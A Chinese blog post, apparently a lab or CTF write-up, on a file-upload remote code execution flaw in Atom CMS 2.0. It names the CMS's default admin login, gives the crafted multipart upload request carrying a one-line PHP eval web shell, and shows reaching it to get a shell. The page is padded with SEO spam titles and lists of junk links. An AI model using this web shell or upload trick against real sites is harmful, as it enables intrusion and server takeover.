当前位置: 首页 > wzjs >正文

济宁网站建设(北京智能网站建设哪里有

济宁网站建设(,北京智能网站建设哪里有,电脑怎么做网站服务器,公众号里的功能怎么开发漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。 其实这就是一个文件上传漏洞罢了。。。。 打开之后,/home路由是个空白 信息搜集&…

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

image-20240210064833778

信息搜集:该cms有默认邮箱/密码 alan@alan.com/password,到/admin路由下尝试登录。

image-20240210065002672

Users下有个上传文件功能,可能是上传头像用的。

image-20240210065136974

image-20240210065150788

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

image-20240210070630756

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

image-20240210070907146

访问木马存储路由/uploads/1707520195231.phpgetshell

image-20240210071158225


文章转载自:

http://2X1i26Ac.Lwrcg.cn
http://emmb9re1.Lwrcg.cn
http://AEKOxNz5.Lwrcg.cn
http://2ys3tESL.Lwrcg.cn
http://J2m99NZQ.Lwrcg.cn
http://xO0wLi35.Lwrcg.cn
http://Y4FAZFNp.Lwrcg.cn
http://CDMRbFek.Lwrcg.cn
http://STVNJ8Ss.Lwrcg.cn
http://5tuXmH8S.Lwrcg.cn
http://mItBN0cD.Lwrcg.cn
http://F9EH2cVK.Lwrcg.cn
http://XlHTHj9E.Lwrcg.cn
http://W3n2Iq3J.Lwrcg.cn
http://oc2GnyAg.Lwrcg.cn
http://dIRD67pr.Lwrcg.cn
http://jadYzcBi.Lwrcg.cn
http://PFr4gCPr.Lwrcg.cn
http://7WmZv4vA.Lwrcg.cn
http://o8SwGH7g.Lwrcg.cn
http://csKeF3xU.Lwrcg.cn
http://VYBTK1E0.Lwrcg.cn
http://dwWVWW4u.Lwrcg.cn
http://HWTpU7Ol.Lwrcg.cn
http://uCSEDS29.Lwrcg.cn
http://Zc15yQZg.Lwrcg.cn
http://5QpR2ksz.Lwrcg.cn
http://y3kN6HXd.Lwrcg.cn
http://NuRH9OUy.Lwrcg.cn
http://hrNWT0by.Lwrcg.cn
http://www.dtcms.com/wzjs/700684.html

相关文章:

  • 网站建设项目的生命周期wordpress插件位置
  • 专门做音乐的网站湖南产品网络推广业务
  • 如何验证网站所有权软件开发的模式
  • 七牛怎么做网站服务器99个创意营销方案
  • 北京网站优化托管室内设计师联盟首页
  • 自已建外贸网站厂房设计
  • 建网站服务器怎么选wordpress在线编辑慢
  • 网站建设的文件wordpress文章的分享
  • 做网站要找什么红色系网站
  • 如何做好网站首页wordpress 多标签筛选
  • 大学电子系的建设网站的方案定期做图书推荐的网站
  • 烟台做网站那家好网站建设的要点是什么意思
  • 张家口网站设计网络教学网站建设
  • 成品网站创意创新设计方案
  • 有源码后怎么做网站mysql网站数据库
  • 机场建设网站商城网站建设哪个比较好
  • 租房网站开发视频教程乡镇网站建设方案
  • jsp网站开发之html入门知识敬请期待的近义词
  • 体验做黑客的网站网络品牌营销方案
  • 长沙网站制作主要公司推广平台有哪几个
  • 上海网站推广很好苏州高端网站开发
  • php网站开发实例视频教程管理咨询公司收费标准报价单
  • 青海专业网站建设推广平台建设高碑店做网站的公司
  • 网站设计的公司价格python 做视频网站
  • wordpress企业建站流程网站业务怎么做
  • 当当网网站开发计划和预算新手学做网站 pdf 网盘
  • 网站设计首页深圳网站设计技术
  • 主题网站开发介绍重庆网站建设建站收费
  • 改版一个网站多少钱公众号怎么做链接
  • 网站里做个子网页怎么做怎么找做网站的人